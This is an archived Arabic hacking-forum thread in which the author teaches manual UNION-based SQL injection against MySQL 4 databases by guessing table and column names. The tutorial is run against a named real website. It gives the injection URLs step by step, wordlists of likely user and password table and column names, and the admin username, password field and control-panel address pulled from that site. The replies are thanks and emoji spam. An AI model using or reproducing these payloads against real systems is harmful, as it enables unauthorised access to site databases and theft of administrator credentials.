المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : كيفية التعامل مع الاصدار الرابع في ثغرات الحقن



QtRoNiX FoX
03-31-2012, 02:49 PM
السلام عليكم ورحمة الله وبركاتة

اول شي مبروك على رجعة الموقع


طيب موضوعنا اليوم شرح عن كيفية التعامل مع الاصدار الرابع "4" في ثغرات الحقن

جميعنا نعرف ان الاصدار الرابع في الحقن صعب جدا وكله تخمين بتخمين واذا بدك تستغل يدوي يمكن تزهق حياتك وانتي تخمن
لذالك الالغلب اصبح يستخدم البرامج للاستغلال
والبعض او عشاق ثغرات الحقن الي بستغلو يدوي بحبو يعرفو طريقه التعامل مع هذا الاصدار (الاصدار الرابع)
والان ساشرح الطريقه + تطبيق على موقع

نبدء على بركة الله..

الموقع الذي سنطبق عليه الشرح عدد اعمدتة 3 وايضا العامود المصاب هو الثالث فقط





http://www.lawchart.com/index.php?id=-3+union+select+1,2,3--

نحذف رقم 3 ونضع بداله كلمة version() لمعرفة اصدار القاعدة ,, يعني يصير الامر هكذا..




http://www.lawchart.com/index.php?id=-3+union+select+1,2,version()--

ظهر معنى الاصدار الرابع " 4.1.22-log "

الان نضيف عليها الامر +from يعني يصبح الرابط هكذا.



http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from--


ونجرب نضيف احد هذة الكلمات ( تابع اسا بتفهم كل شي .. )

member
admin
user
users
accounts
std_users
myuser
sys_user
mysql.db ++user
main
sf_user
tt_user
mo_user
mos_user
login
mysql.user
mysql.users
admin_login
jos_users
jos_session
wp_users
bg_users
usuarios
login_username
user_login
admin_sections

نجربهن ونشوف اي وحدي منهن الصحيحه

ما هذة الكلمات ؟؟ لماذا!؟
هذة الكلمات هي من الممكن ان تكون اسم الجدول الي يوجد بداخله اليوزر والباسورد
يعني هذه الكلمات هي اسماء الجداول الي فيها ملف اليوزر والباسورد (ممكن يكونو هني وممكن لا ;))

ولكن كيف سأعرف ان هذا اسم الجدول صحيح ام غير صحيح ؟؟
على سبيل المثال عندما تضع كلمة member او اي كلمة موجودة بالاعلى..



http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+member--

اذا ظهر معك خطء ورجعت الصفحة خربت من هنا اعرف ان هذة الكلمه غير صحيحه وما في منو هاد الجدول ,,, حاول تجرب على كلمة ثانيه
واذا لم يظهر معك الخطء ولم يتغير شي بالصفحة فهذا هو الجدول الي بداخله يوجد ملف اليوزر والباسورد

وبالموقع الي منطبق عليه زبطت معنا كلمة users يعني هيك يصير الرابط



http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+users--



احنا هيك تخطينا اول خطوة من التخمين وضل علينا نخمن اسم ملف اليوزر واسم ملف الباسورد

لكن كيف ستحدث هذة؟؟
نحن قلنا ان العامود المصاب هو العامود الثالث يعني التخمين رح يكون على العامود الثالث

لتخمين اليوزر

login
user
username
users
username
user_name
admin
adminlogin
loginmember
membername
admin_lastname
lastname
fristname
uname
name
+user_login
aid
id
user_sections
user_username
user_id
user_first_name

----------------
لتخمين الباسورد

userPass
password
admin_password
pass
passwd
pwd
user_pass
user_password


وعلى الموقع الي منطبق عليه زبط معنا username,password
يعني لو بدنا نطلع اليوزر منحط بدل الرقم 3 "username" ..يصير الرابط هيك..



http://www.lawchart.com/index.php?id=-3+union+select+1,2,username+from+users--


طيب حلوو طلع لنا اليوزرنيم:- admin

الان نطلع الباسورد ,, نستبدل كلمة username بكلمة password يعني الرابط بصير هيك



http://www.lawchart.com/index.php?id=-3+union+select+1,2,password+from+users--


تمام طلع لنا الباسورد:- [email protected]



والان تفضلو اليوزر والباسورد ولوحة تحكم الموقع


http://www.lawchart.com/admin/

user: admin
pass: [email protected]




اتمنى ان اكون قد افدتكم وساعدتكم ولو بشيء بسيط
تحياتي
اخوكم QtRoNiX FoX

salah.x
03-31-2012, 04:10 PM
شكرا لك
مميز والله
تقبل مروري المتواضع
سأترك الوحة للاعظاء المبتدئين
نريد انكس جميل اوك
تقبل مروري المتواضع اخي
بارك الله فيك
ومبروووووك عودة الموقع

salah.x
03-31-2012, 04:14 PM
+تم التقييم
لاتحرمنا جديدك اخي

QtRoNiX FoX
03-31-2012, 06:00 PM
اهلين اخي صلاح ولا تحرمنا من طلاتك

بالتوفيق

salah.x
03-31-2012, 09:07 PM
شكرا لك اخي
هاذا شرف الي

HaCKer011
04-12-2012, 11:36 PM
مشكووور عالشرح الجميل
لا تحرمنا من جديدك

كريتوس2013
12-07-2012, 01:28 PM
تحيااااااااتي لك

Memo123123
12-22-2012, 08:21 PM
والله العظيم اني كنت مستصعب الثغره هاي كلها بس والله فهمتها من درسك
يا اخي عنجد شكرا الك شكرا جزيلا
ولا تحرمنا جديدك :redface::redface::redface::redface::redface::redf ace::redface::redface::redface::redface::redface:: redface::redface::redface::redface::redface::redfa ce::redface::redface::redface::redface::redface::r edface::redface::redface::redface::redface::redfac e::redface::redface::redface::redface::redface::re dface::redface::redface::redface::redface::redface ::redface::redface::redface::redface::redface::red face::redface::redface::redface::redface::redface: :redface::redface::redface::redface::redface::redf ace::redface::redface::redface::redface::redface:: redface::redface::redface::redface::redface::redfa ce::redface::redface::redface::redface::redface::r edface::redface::redface::redface::redface::redfac e::redface::redface::redface::redface::redface::re dface::redface::redface::redface::redface::redface ::redface::redface::redface::redface::redface::red face::redface::redface::redface::redface::redface: :redface::redface::redface::redface::redface::redf ace::redface::redface::redface::redface::redface:: redface::redface::redface::redface::redface::redfa ce::redface::redface::redface::redface::redface::r edface::redface::redface::redface::redface::redfac e::redface::redface::redface::redface::redface::re dface::redface::redface::redface::redface::redface ::redface::redface::redface::redface::redface::red face::redface::redface::redface::redface::redface: :redface::redface::redface::redface::redface::redf ace::redface::redface::redface::redface::redface:: redface::redface::redface::redface::redface::redfa ce::redface::redface::redface::redface::redface::r edface::redface::redface::redface::redface::redfac e::redface::redface:

سارة الغامدي
12-22-2012, 09:25 PM
مشكؤؤر
يعطيك العآفية

boss-m
12-22-2012, 09:29 PM
مشكووور يا بطل ♥

sasoufa
12-26-2012, 09:28 PM
مشكور واصل ابداعك

specter hacker
01-14-2013, 08:58 PM
مشكور اخي بيض الله وجهك يوم تبيض وجوه تسود وجوه
حقيقتن انت ماقصرت وشرحك بسيط ومفهووم للكل ...

,,,شكرا,,,

al_gokr81
01-14-2013, 09:41 PM
مشكور وبارك الله فيك